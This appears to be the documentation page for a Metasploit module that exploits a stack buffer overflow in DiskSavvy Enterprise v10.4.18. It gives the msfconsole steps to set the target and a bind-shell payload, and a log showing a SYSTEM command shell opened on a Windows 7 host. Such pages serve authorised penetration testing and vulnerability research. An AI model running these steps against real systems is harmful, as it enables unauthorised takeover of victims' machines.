1.6 KiB
1.6 KiB
Vulnerable Application
DiskSavvy Enterprise version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at DiskSavvy Enterprise.
Verification Steps
- Install a vulnerable DiskSavvy Enterprise
- Start
msfconsole - Do
use exploit/windows/misc/disk_savvy_adm - Do
set RHOST ip - Do
set PAYLOAD windows/shell/bind_tcp - Do
exploit - Enjoy your shell
Scenarios
DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
msf > use exploit/windows/misc/disk_savvy_adm
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit
[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>